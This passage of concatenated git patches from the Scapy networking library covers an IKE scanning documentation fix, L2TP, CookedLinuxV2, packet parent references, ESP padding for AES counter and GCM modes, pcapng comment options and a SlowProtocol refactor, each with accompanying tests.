live host. We can collect results with the following command:: @@ -1430,7 +1441,7 @@ IKE Scanning We try to identify VPN concentrators by sending ISAKMP Security Association proposals and receiving the answers:: - >>> res, unans = sr( IP(dst="192.168.1.*")/UDP() + >>> res, unans = sr( IP(dst="192.168.1.0/24")/UDP() /ISAKMP(init_cookie=RandString(8), exch_type="identity prot.") /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) ) From f97590d356daa0f7f67e4c126912917e1a455b69 Mon Sep 17 00:00:00 2001 From: b1gr3db <73140724+b1gr3db@users.noreply.github.com> Date: Wed, 18 May 2022 08:35:27 -0400 Subject: [PATCH 0784/1632] Minor fix to L2TP length (#3473) Fix length initialization --- scapy/layers/l2tp.py | 2 +- test/scapy/layers/l2tp.uts | 3 +++ 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/layers/l2tp.py b/scapy/layers/l2tp.py index a8e6f28a253..3480f5ebd6d 100644 --- a/scapy/layers/l2tp.py +++ b/scapy/layers/l2tp.py @@ -25,7 +25,7 @@ class L2TP(Packet): 'res06', 'sequence', 'res08', 'res09', 'length', 'control']), # noqa: E501 BitEnumField("version", 2, 4, {2: 'L2TPv2'}), - ConditionalField(ShortField("len", 0), + ConditionalField(ShortField("len", None), lambda pkt: pkt.hdr & 'control+length'), ShortField("tunnel_id", 0), ShortField("session_id", 0), diff --git a/test/scapy/layers/l2tp.uts b/test/scapy/layers/l2tp.uts index b4984b93aa8..cea9a691008 100644 --- a/test/scapy/layers/l2tp.uts +++ b/test/scapy/layers/l2tp.uts @@ -8,6 +8,9 @@ s = raw(IP(src="127.0.0.1", dst="127.0.0.1")/UDP()/L2TP()) s == b'E\x00\x00"\x00\x01\x00\x00@\x11|\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x06\xa5\x06\xa5\x00\x0e\xf4\x83\x00\x02\x00\x00\x00\x00' += L2TP - build with computed length +assert bytes(L2TP(hdr="control+length", tunnel_id=1, session_id=2)) == b'\xc0\x02\x00\x0c\x00\x01\x00\x02\x00\x00\x00\x00' + = L2TP - dissection p = IP(s) L2TP in p and len(p[L2TP]) == 6 and p.tunnel_id == 0 and p.session_id == 0 and p[UDP].chksum == 0xf483 From 819ef8d963b17c012f0dc8ded393adfa18bd287e Mon Sep 17 00:00:00 2001 From: Tero Saarni Date: Sun, 24 Apr 2022 16:31:14 +0300 Subject: [PATCH 0785/1632] Add support for DLT_LINUX_SLL2 capture format --- scapy/data.py | 1 + scapy/layers/can.py | 2 +- scapy/layers/l2.py | 33 ++++++++++++++++++++++++++------- test/scapy/layers/l2.uts | 24 ++++++++++++++++++++++++ 4 files changed, 52 insertions(+), 8 deletions(-) diff --git a/scapy/data.py b/scapy/data.py index df0c48449ac..5d2d37f5397 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -132,6 +132,7 @@ DLT_BLUETOOTH_LE_LL_WITH_PHDR = 256 DLT_VSOCK = 271 DLT_ETHERNET_MPACKET = 274 +DLT_LINUX_SLL2 = 276 # From net/ipv6.h on Linux (+ Additions) IPV6_ADDR_UNICAST = 0x01 diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 286f1c6bf45..c801ef1a73a 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -127,7 +127,7 @@ def post_build(self, pkt, pay): This is based on a copy of the Packet.self_build default method. The goal is to affect only the CAN layer data and keep - under layers (e.g LinuxCooked) unchanged + under layers (e.g CookedLinux) unchanged """ if conf.contribs['CAN']['swap-bytes']: data = CAN.inv_endianness(pkt) # type: bytes diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 84f5186c843..c294489c39a 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -21,13 +21,14 @@ from scapy.config import conf from scapy import consts from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ - DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LOOP, \ - DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, \ + DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ + DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, \ ETH_P_MACSEC from scapy.error import warning, ScapyNoDstMacException, log_runtime from scapy.fields import ( BCDFloatField, BitField, + ByteEnumField, ByteField, ConditionalField, FCSField, @@ -291,21 +292,38 @@ def l2_register_l3(l2, l3): conf.neighbor.register_l3(Dot3, LLC, l2_register_l3) +COOKED_LINUX_PACKET_TYPES = { + 0: "unicast", + 1: "broadcast", + 2: "multicast", + 3: "unicast-to-another-host", + 4: "sent-by-us" +} + + class CookedLinux(Packet): # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html name = "cooked linux" # from wireshark's database - fields_desc = [ShortEnumField("pkttype", 0, {0: "unicast", - 1: "broadcast", - 2: "multicast", - 3: "unicast-to-another-host", - 4: "sent-by-us"}), + fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), XShortField("lladdrtype", 512), ShortField("lladdrlen", 0), StrFixedLenField("src", b"", 8), XShortEnumField("proto", 0x800, ETHER_TYPES)] +class CookedLinuxV2(CookedLinux): + # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html + name = "cooked linux v2" + fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES), + ShortField("reserved", 0), + IntField("ifindex", 0), + XShortField("lladdrtype", 512), + ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), + ByteField("lladdrlen", 0), + StrFixedLenField("src", b"", 8)] + + class MPacketPreamble(Packet): # IEEE 802.3br Figure 99-3 name = "MPacket Preamble" @@ -674,6 +692,7 @@ class Dot1AD(Dot1Q): conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether) conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3) conf.l2types.register(DLT_LINUX_SLL, CookedLinux) +conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2) conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble) conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux) conf.l2types.register(DLT_LOOP, Loopback) diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index 2a3bedd9953..6e1ac984aa7 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -83,3 +83,27 @@ assert isinstance(p.payload, NoPayload) p = ARP(pdst='192.168.178.0/24') assert "Net" in repr(p) + + +############ +############ ++ CookedLinux + += CookedLinux - Basic Dissection + +cl = CookedLinux(b'\x00\x00\x03\x04\x00\x06\x00\x00\x00\x00\x00\x00\x6f\x50\x08\x00') +assert cl.pkttype == 0 # unicast +assert cl.lladdrtype == 772 # loopback +assert cl.lladdrlen == 6 +assert cl.src == b'\x00\x00\x00\x00\x00\x00\x6f\x50' +assert cl.proto == 2048 + += CookedLinuxV2 - Basic Dissection + +clv2 = CookedLinuxV2(b'\x08\x00\x00\x00\x00\x00\x00\x03\x00\x01\x00\x06\xaa\x1f\x9c\xc0\x5a\x7e\x00\x00') +assert clv2.proto == 2048 +assert clv2.ifindex == 3 +assert clv2.lladdrtype == 1 # ether +assert clv2.pkttype == 0 # unicast +assert clv2.lladdrlen == 6 +assert clv2.src == b'\xaa\x1f\x9c\xc0\x5a\x7e\x00\000' From 6d7184e8bec5102dfa66bcc10432a30a7e0dcf3a Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Wed, 18 May 2022 20:34:08 +0300 Subject: [PATCH 0786/1632] Add parent field to Packet (#3607) Co-authored-by: Sergey Matsievskiy --- scapy/fields.py | 6 +++++- scapy/packet.py | 28 ++++++++++++++++++++++++++-- test/fields.uts | 8 ++++++++ 3 files changed, 39 insertions(+), 3 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index c8c69d8b070..3a3232a94da 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1422,6 +1422,7 @@ def getfield(self, ): # type: (...) -> Tuple[bytes, K] i = self.m2i(pkt, s) + i.add_parent(pkt) remain = b"" if conf.padding_layer in i: r = i[conf.padding_layer] @@ -1474,7 +1475,8 @@ class PacketListField(_PacketField[List[BasePacket]]): that might occur right in the middle of another Packet field. This field type may also be used to indicate that a series of Packet instances have a sibling semantic instead of a parent/child relationship - (i.e. a stack of layers). + (i.e. a stack of layers). All elements in PacketListField have current + packet referenced in parent field. """ __slots__ = ["count_from", "length_from", "next_cls_cb"] islist = 1 @@ -1666,6 +1668,8 @@ def getfield(self, pkt, s): c += 1 else: remain = b"" + if isinstance(p, BasePacket): + p.add_parent(pkt) lst.append(p) return remain + ret, lst diff --git a/scapy/packet.py b/scapy/packet.py index 871fa52584f..1bcfd740b99 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -85,8 +85,8 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore "packetfields", "original", "explicit", "raw_packet_cache", "raw_packet_cache_fields", "_pkt", "post_transforms", - # then payload and underlayer - "payload", "underlayer", + # then payload, underlayer and parent + "payload", "underlayer", "parent", "name", # used for sr() "_answered", @@ -131,6 +131,7 @@ def __init__(self, post_transform=None, # type: Any _internal=0, # type: int _underlayer=None, # type: Optional[Packet] + _parent=None, # type: Optional[Packet] **fields # type: Any ): # type: (...) -> None @@ -148,6 +149,7 @@ def __init__(self, self.payload = NoPayload() self.init_fields() self.underlayer = _underlayer + self.parent = _parent self.original = _pkt self.explicit = 0 self.raw_packet_cache = None # type: Optional[bytes] @@ -368,6 +370,20 @@ def remove_underlayer(self, other): # type: (Packet) -> None self.underlayer = None + def add_parent(self, parent): + # type: (Packet) -> None + """Set packet parent. + When packet is an element in PacketListField, parent field would + point to the list owner packet.""" + self.parent = parent + + def remove_parent(self, other): + # type: (Packet) -> None + """Remove packet parent. + When packet is an element in PacketListField, parent field would + point to the list owner packet.""" + self.parent = None + def copy(self): # type: () -> Packet """Returns a deep copy of the instance.""" @@ -1668,6 +1684,14 @@ def remove_underlayer(self, other): # type: (Packet) -> None pass + def add_parent(self, parent): + # type: (Any) -> None + pass + + def remove_parent(self, other): + # type: (Packet) -> None + pass + def copy(self): # type: () -> NoPayload return self diff --git a/test/fields.uts b/test/fields.uts index 6641527f105..3d31e31bf90 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -461,6 +461,14 @@ p p.show() IP in p and TCP in p and UDP in p and p[TCP].seq == 1234567 += Test parent reference +~ field lengthfield +x=TestPLF(plist=[IP()/TCP(), IP()/UDP()]) +p = TestPLF(raw(x)) +p +p.show() +p.getlayer(IP, 1).parent == p and p.getlayer(IP, 2).parent == p + = Nested PacketListField ~ field lengthfield y=IP()/TCP(seq=111111)/TestPLF(plist=[IP()/TCP(seq=222222),IP()/UDP()]) From dd8ad1c9aa9894028770d349c74013f6de06b6f4 Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Sat, 28 May 2022 23:27:06 +0300 Subject: [PATCH 0787/1632] Make parent available in guess_payload_class (#3614) Co-authored-by: Sergey Matsievskiy --- scapy/fields.py | 12 ++++++++++-- test/fields.uts | 48 +++++++++++++++++++++++++++++++++++++++++++++--- 2 files changed, 55 insertions(+), 5 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 3a3232a94da..b0e333bb388 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1414,7 +1414,11 @@ def i2m(self, def m2i(self, pkt, m): # type: (Optional[Packet], bytes) -> Packet - return self.cls(m) + try: + # we want to set parent wherever possible + return self.cls(m, _parent=pkt) # type: ignore + except TypeError: + return self.cls(m) def getfield(self, pkt, # type: Packet @@ -1648,7 +1652,11 @@ def getfield(self, pkt, s): c -= 1 try: if cls is not None: - p = cls(remain) + try: + # we want to set parent wherever possible + p = cls(remain, _parent=pkt) + except TypeError: + p = cls(remain) else: p = self.m2i(pkt, remain) except Exception: diff --git a/test/fields.uts b/test/fields.uts index 3d31e31bf90..1e39df83eda 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -464,10 +464,31 @@ IP in p and TCP in p and UDP in p and p[TCP].seq == 1234567 = Test parent reference ~ field lengthfield x=TestPLF(plist=[IP()/TCP(), IP()/UDP()]) +assert p.getlayer(IP, 1).parent == p and p.getlayer(IP, 2).parent == p p = TestPLF(raw(x)) -p -p.show() -p.getlayer(IP, 1).parent == p and p.getlayer(IP, 2).parent == p +assert p.getlayer(IP, 1).parent == p and p.getlayer(IP, 2).parent == p + += Test parent reference in guess_payload_class + +class TestGuessPLFInner(Packet): + name="test guess inner" + fields_desc=[ LenField("foo", None) ] + def guess_payload_class(self, payload): + self.parentflag = True + if self.parent is None: + # all exceptions are caught, so have to use flag + self.parentflag = False + return super(TestGuessPLFInner, self).guess_payload_class(payload) + +class TestGuessPLF(Packet): + name="test guess" + fields_desc=[PacketListField("plist", None, TestGuessPLFInner, + next_cls_cb=lambda p,l,c,r: TestGuessPLFInner if len(l) == 0 else None)] + +x=TestGuessPLF(plist=TestGuessPLFInner()/Raw(b'123')) +p=TestGuessPLF(raw(x)) +assert p[TestGuessPLFInner].parentflag +assert p[TestGuessPLFInner].parent == p = Nested PacketListField ~ field lengthfield @@ -2111,6 +2132,27 @@ assert isinstance(p.packet.byte, RandByte) assert isinstance(p.packet.long, RandLong) assert isinstance(p.short2, RandShort) += Test parent reference in guess_payload_class + +class TestGuessInner(Packet): + name="test guess inner" + fields_desc=[ ByteField("foo", 0) ] + def guess_payload_class(self, payload): + self.parentflag = True + if self.parent is None: + # all exceptions are caught, so have to use flag + self.parentflag = False + return super(TestGuessInner, self).guess_payload_class(payload) + +class TestGuess(Packet): + name="test guess" + fields_desc=[ PacketField("pf", None, TestGuessInner) ] + +x=TestGuess(pf=TestGuessInner()/Raw(b'123')) +p=TestGuess(raw(x)) +assert p[TestGuessInner].parentflag +assert p[TestGuessInner].parent == p + ############ ############ + XStr(*)Field tests From 1774a515d60fa8c23a6e587fa725fbb54b584392 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 7 Jun 2022 08:44:58 +0200 Subject: [PATCH 0788/1632] Fix docs CI-build --- doc/scapy/conf.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 8f5b90d9a6a..8776319cac8 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -84,7 +84,7 @@ # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. -language = None +language = 'en' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. From f07e8c7a00a07aab9daf8b0256f9e0e49f2f5c34 Mon Sep 17 00:00:00 2001 From: Christian Hopps Date: Sat, 28 May 2022 03:29:26 -0400 Subject: [PATCH 0789/1632] fix required block size for CCM, CTR and GCM ipsec.py incorrectly uses the cipher block size to pad ESP for CCM, CTR and GCM algorithms. These algorithms do not require this padding, and it can result in packets not being delivered (e.g., MTU violations). fixes #2322 References: CCM: https://datatracker.ietf.org/doc/html/rfc4309#section-3.2 CTR: https://datatracker.ietf.org/doc/html/rfc3686#section-2.3 GCM: https://datatracker.ietf.org/doc/html/rfc4106#section-3.2 Signed-off-by: Christian Hopps --- scapy/layers/ipsec.py | 3 ++ test/scapy/layers/ipsec.uts | 71 +++++++++++++++++++++++++++++++++++++ 2 files changed, 74 insertions(+) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 9ba7c40fd96..39d69809cbc 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -446,6 +446,7 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): CRYPT_ALGOS['AES-CTR'] = CryptAlgo('AES-CTR', cipher=algorithms.AES, mode=modes.CTR, + block_size=1, iv_size=8, salt_size=4, format_mode_iv=_aes_ctr_format_mode_iv) @@ -454,6 +455,7 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): cipher=algorithms.AES, mode=modes.GCM, salt_size=4, + block_size=1, iv_size=8, icv_size=16, format_mode_iv=_salt_format_mode_iv) @@ -461,6 +463,7 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): CRYPT_ALGOS['AES-CCM'] = CryptAlgo('AES-CCM', cipher=algorithms.AES, mode=modes.CCM, + block_size=1, iv_size=8, salt_size=3, icv_size=16, diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index e5f96262d62..9b139f3b5dd 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -1991,6 +1991,77 @@ try: except IPSecIntegrityError as err: err +####################################### += IPv4 / ESP - Tunnel - AES-CTR - NULL - verify no cipher align padding + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= UDP(sport=1000, dport=1001) +p /= Raw("\x00" * 3) +p +print("len p: {}".format(len(p))) + +# oiphdr esphdr iiphdr udphdr data esptail iv +# 20 + 8 + 20 + 8 + 3 + 2 + 8 = 69 +# CipherInput: iiphdr udphdr data esptail +# 20 + 8 + 3 + 2 = 33 +# good: (33 % 4) == 1, pad == (4-1) == 3, len == 36+33+3 == 72 +# bad: (33 % 16) == 1, pad == (16-1) == 15, len == 36+33+15 == 84 + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-CTR', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None, + tunnel_header=IP(src='11.11.11.11', dst='22.22.22.22')) +print("crypt_algo.icv_size {}".format(sa.crypt_algo.icv_size)) +print("auth_algo.icv_size {}".format(sa.auth_algo.icv_size)) + +e = sa.encrypt(p) +e +print("len e: {}".format(len(e))) + +esp = sa.crypt_algo.decrypt(sa, e[ESP], sa.crypt_key, + sa.crypt_algo.icv_size or + sa.auth_algo.icv_size, + esn_en=sa.esn_en, + esn=sa.esn) +esp +print("len(esp.data): {}".format(len(esp.data))) + +* after encryption packet should be padded for 4 byte alignment +assert len(e) == 72 and esp.padlen == 3, "bad length/padding {}/{}".format(len(e), esp.padlen) + +####################################### += IPv4 / ESP - Tunnel - AES-GCM - NULL - verify no cipher align padding + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= UDP(sport=1000, dport=1001) +p /= Raw("\x00" * 1418) +print("len p: {}".format(len(p))) + +# oiphdr esphdr iiphdr udphdr data esptail iv icv +# 20 + 8 + 20 + 8 +1418 + 2 +8 +16 = 1500 +# CipherInput: iiphdr udphdr data esptail +# 20 + 8 +1418 + 2 = 1448 +# good: (1448 % 4) == 0, pad == 0, len == 52+1448+0 == 1500 +# bad: (1448 % 16) == 8, pad == (16-8) == 8, len == 52+1448+8 == 1508 + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-GCM', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None, + tunnel_header=IP(src='11.11.11.11', dst='22.22.22.22')) + +e = sa.encrypt(p) +print("len e: {}".format(len(e))) + +esp = sa.crypt_algo.decrypt(sa, e[ESP], sa.crypt_key, + sa.crypt_algo.icv_size or + sa.auth_algo.icv_size, + esn_en=sa.esn_en, + esn=sa.esn) +print("len(esp.data): {}".format(len(esp.data))) + +* after encryption packet should be padded for 4 byte alignment +assert len(e) == 1500 and esp.padlen == 0, "bad length/padding {}/{}".format(len(e), esp.padlen) + ####################################### = IPv4 / ESP - Tunnel - AES-CCM - NULL ~ crypto_advanced From 3485d36dc34c0fbaeb4c1dd2bccc0e814fc18f47 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 7 Jun 2022 11:17:25 +0200 Subject: [PATCH 0790/1632] Pcapng comment option #3600 * Read pcapng comment option * Write pcapng comment option * Fix bytes comment issue * Applying gpotter2 comments Co-authored-by: Laurent Laubin --- scapy/packet.py | 9 ++++- scapy/utils.py | 87 +++++++++++++++++++++++++++++++++++---------- test/regression.uts | 6 ++++ 3 files changed, 82 insertions(+), 20 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 1bcfd740b99..788ed58936b 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -94,6 +94,7 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore "direction", "sniffed_on", # handle snaplen Vs real length "wirelen", + "comment" ] name = None fields_desc = [] # type: Sequence[AnyField] @@ -157,6 +158,7 @@ def __init__(self, self.wirelen = None # type: Optional[int] self.direction = None # type: Optional[int] self.sniffed_on = None # type: Optional[_GlobInterfaceType] + self.comment = None # type: Optional[bytes] if _pkt: self.dissect(_pkt) if not _internal: @@ -192,7 +194,8 @@ def __init__(self, Optional[Union[EDecimal, float, None]], Optional[int], Optional[_GlobInterfaceType], - Optional[int] + Optional[int], + Optional[bytes], ] def __reduce__(self): @@ -204,6 +207,7 @@ def __reduce__(self): self.direction, self.sniffed_on, self.wirelen, + self.comment )) def __setstate__(self, state): @@ -214,6 +218,7 @@ def __setstate__(self, state): self.direction = state[2] self.sniffed_on = state[3] self.wirelen = state[4] + self.comment = state[5] return self def __deepcopy__(self, @@ -402,6 +407,7 @@ def copy(self): clone.payload = self.payload.copy() clone.payload.add_underlayer(clone) clone.time = self.time + clone.comment = self.comment return clone def _resolve_alias(self, attr): @@ -1080,6 +1086,7 @@ def clone_with(self, payload=None, **kargs): self.raw_packet_cache_fields ) pkt.wirelen = self.wirelen + pkt.comment = self.comment if payload is not None: pkt.add_payload(payload) return pkt diff --git a/scapy/utils.py b/scapy/utils.py index dfa2081282c..cf6e8f189c2 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1415,7 +1415,8 @@ class RawPcapNgReader(RawPcapReader): PacketMetadata = collections.namedtuple("PacketMetadataNg", # type: ignore ["linktype", "tsresol", - "tshigh", "tslow", "wirelen"]) + "tshigh", "tslow", "wirelen", + "comment"]) def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None @@ -1517,9 +1518,9 @@ def _read_packet(self, size=MTU): # type: ignore return res def _read_options(self, options): - # type: (bytes) -> Dict[str, int] + # type: (bytes) -> Dict[str, Any] """Section Header Block""" - opts = self.default_options.copy() + opts = self.default_options.copy() # type: Dict[str, Any] while len(options) >= 4: code, length = struct.unpack(self.endian + "HH", options[:4]) # PCAP Next Generation (pcapng) Capture File Format @@ -1530,6 +1531,13 @@ def _read_options(self, options): opts["tsresol"] = (2 if tsresol & 128 else 10) ** ( tsresol & 127 ) + if code == 1 and length >= 1 and 4 + length < len(options): + comment = options[4:4 + length] + newline_index = comment.find(b"\n") + if newline_index == -1: + warning("PcapNg: invalid comment option") + break + opts["comment"] = comment[:newline_index] if code == 0: if length != 0: warning("PcapNg: invalid option length %d for end-of-option" % length) # noqa: E501 @@ -1575,13 +1583,25 @@ def _read_block_epb(self, block, size): warning("PcapNg: EPB is too small %d/20 !" % len(block)) raise EOFError + # Compute the options offset taking padding into account + if caplen % 4: + opt_offset = 20 + caplen + (-caplen) % 4 + else: + opt_offset = 20 + caplen + + # Parse options + options = self._read_options(block[opt_offset:]) + comment = options.get("comment", None) + self._check_interface_id(intid) + return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 tsresol=self.interfaces[intid][2], # noqa: E501 tshigh=tshigh, tslow=tslow, - wirelen=wirelen)) + wirelen=wirelen, + comment=comment)) def _read_block_spb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1604,7 +1624,8 @@ def _read_block_spb(self, block, size): tsresol=self.interfaces[intid][2], # noqa: E501 tshigh=None, tslow=None, - wirelen=wirelen)) + wirelen=wirelen, + comment=None)) def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1624,7 +1645,8 @@ def _read_block_pkt(self, block, size): tsresol=self.interfaces[intid][2], # noqa: E501 tshigh=tshigh, tslow=tslow, - wirelen=wirelen)) + wirelen=wirelen, + comment=None)) def _read_block_dsb(self, block, size): # type: (bytes, int) -> None @@ -1696,7 +1718,7 @@ def read_packet(self, size=MTU): rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError - s, (linktype, tsresol, tshigh, tslow, wirelen) = rp + s, (linktype, tsresol, tshigh, tslow, wirelen, comment) = rp try: cls = conf.l2types.num2layer[linktype] # type: Type[Packet] p = cls(s) # type: Packet @@ -1712,6 +1734,7 @@ def read_packet(self, size=MTU): if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen + p.comment = comment return p def recv(self, size=MTU): @@ -1732,7 +1755,8 @@ def _write_packet(self, sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] - wirelen=None # type: Optional[int] + wirelen=None, # type: Optional[int] + comment=None # type: Optional[bytes] ): # type: (...) -> None raise NotImplementedError @@ -1813,10 +1837,13 @@ def write_packet(self, if wirelen is None: wirelen = caplen + comment = getattr(packet, "comment", None) + self._write_packet( rawpkt, sec=f_sec, usec=usec, - caplen=caplen, wirelen=wirelen + caplen=caplen, wirelen=wirelen, + comment=comment ) @@ -1965,7 +1992,8 @@ def _write_packet(self, sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] - wirelen=None # type: Optional[int] + wirelen=None, # type: Optional[int] + comment=None # type: Optional[bytes] ): # type: (...) -> None """ @@ -2043,13 +2071,19 @@ def _get_time(self, return sec, usec # type: ignore - def build_block(self, block_type, block_body): - # type: (bytes, bytes) -> bytes + def _add_padding(self, raw_data): + # type: (bytes) -> bytes + raw_data += ((-len(raw_data)) % 4) * b"\x00" + return raw_data + + def build_block(self, block_type, block_body, options=None): + # type: (bytes, bytes, Optional[bytes]) -> bytes # Pad Block Body to 32 bits - if len(block_body) % 4 != 0: - padding = b"\x00" * (4 - len(block_body) % 4) - block_body += padding + block_body = self._add_padding(block_body) + + if options: + block_body += options # An empty block is 12 bytes long block_total_length = 12 + len(block_body) @@ -2118,7 +2152,8 @@ def _write_block_epb(self, raw_pkt, # type: bytes timestamp=None, # type: Optional[Union[EDecimal, float]] # noqa: E501 caplen=None, # type: Optional[int] - orglen=None # type: Optional[int] + orglen=None, # type: Optional[int] + comment=None # type: Optional[bytes] ): # type: (...) -> None @@ -2150,14 +2185,28 @@ def _write_block_epb(self, # Packet Data block_epb += raw_pkt - self.f.write(self.build_block(block_type, block_epb)) + # Comment option + comment_opt = None + if comment: + comment = bytes_encode(comment) + if not comment.endswith(b"\n"): + comment += b"\n" + comment_opt = struct.pack(self.endian + "HH", 1, len(comment)) + + # Pad Option Value to 32 bits + comment_opt += self._add_padding(bytes_encode(comment)) + comment_opt += struct.pack(self.endian + "HH", 0, 0) + + self.f.write(self.build_block(block_type, block_epb, + options=comment_opt)) def _write_packet(self, packet, # type: bytes sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] - wirelen=None # type: Optional[int] + wirelen=None, # type: Optional[int] + comment=None # type: Optional[bytes] ): # type: (...) -> None """ @@ -2183,7 +2232,7 @@ def _write_packet(self, wirelen = caplen self._write_block_epb(packet, timestamp=sec, caplen=caplen, - orglen=wirelen) + orglen=wirelen, comment=comment) if self.sync: self.f.flush() diff --git a/test/regression.uts b/test/regression.uts index 9889734ff1b..a22c5799d48 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1871,6 +1871,12 @@ l = rdpcap(tmpfile) assert b"Scapy" in l[0][Raw].load assert l[0].time == ts +p = Ether() / IPv6() / TCP() +p.comment = b"Hello Scapy!" +wrpcapng(tmpfile, p) +l = rdpcap(tmpfile) +assert l[0].comment.strip() == p.comment + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) From 254ab454b8bbf30ef734a406f07e1f0a6bbd5ae3 Mon Sep 17 00:00:00 2001 From: Lars Munch Date: Sat, 23 Apr 2022 10:19:14 +0200 Subject: [PATCH 0791/1632] Split slow protocol into seperate file Split slow protocol into seperate file to prepare for use by ESMC. --- scapy/contrib/lacp.py | 19 +------------------ scapy/contrib/slowprot.py | 39 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 40 insertions(+), 18 deletions(-) create mode 100644 scapy/contrib/slowprot.py diff --git a/scapy/contrib/lacp.py b/scapy/contrib/lacp.py index 16fd71aac4b..b89cbf4144d 100644 --- a/scapy/contrib/lacp.py +++ b/scapy/contrib/lacp.py @@ -17,24 +17,7 @@ from scapy.packet import Packet, bind_layers from scapy.fields import ByteField, MACField, ShortField, ByteEnumField, IntField, XStrFixedLenField # noqa: E501 -from scapy.layers.l2 import Ether -from scapy.data import ETHER_TYPES - - -ETHER_TYPES[0x8809] = 'SlowProtocol' -SLOW_SUB_TYPES = { - 'Unused': 0, - 'LACP': 1, - 'Marker Protocol': 2, -} - - -class SlowProtocol(Packet): - name = "SlowProtocol" - fields_desc = [ByteEnumField("subtype", 0, SLOW_SUB_TYPES)] - - -bind_layers(Ether, SlowProtocol, type=0x8809, dst='01:80:c2:00:00:02') +from scapy.contrib.slowprot import SlowProtocol class LACP(Packet): diff --git a/scapy/contrib/slowprot.py b/scapy/contrib/slowprot.py new file mode 100644 index 00000000000..56835ac2dd1 --- /dev/null +++ b/scapy/contrib/slowprot.py @@ -0,0 +1,39 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR 